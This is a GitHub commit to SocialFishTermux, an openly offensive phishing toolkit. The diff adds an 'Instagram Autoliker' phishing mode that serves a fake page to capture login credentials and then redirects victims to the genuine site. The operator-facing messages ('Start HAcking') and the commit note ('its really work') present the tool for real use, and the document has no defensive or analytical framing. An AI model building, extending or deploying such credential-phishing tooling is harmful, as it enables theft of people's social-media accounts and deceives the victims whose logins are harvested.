SocialFishTermux also got a new instagram phishing

Try it ... its really work....
This commit is contained in:
An0nUD4Y 2018-04-18 18:17:49 +05:30 committed by GitHub
parent 55c8308ee2
commit 6957a3ea4a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -99,7 +99,9 @@ def runPhishing(social, option2):
system('cp WebPagesTermux/twitter/*.* ServerTermux/www/')
elif option2 == '1' and social == 'Instagram':
system('cp WebPagesTermux/Instagram_web/*.* ServerTermux/www/')
elif option2 == '2' and social == 'Instagram':
system('cp WebPagesTermux/Instagram_autoliker/*.* ServerTermux/www/')
def waitCreds():
print " {0}[{1}*{0}]{1} Hi Hacker Everything has been completed.............. Start HAcking ".format(RED, END)
print " {0}[{1}*{0}]{1} I HAVE A TIP FOR YOU".format(GREEN, END)
@ -190,7 +192,7 @@ def runPEnv():
runPhishing('Twitter', option2)
elif option == '8':
loadModule('Instagram')
option2 =raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
option2 =raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
runPhishing('Instagram', option2)
else:
exit(0)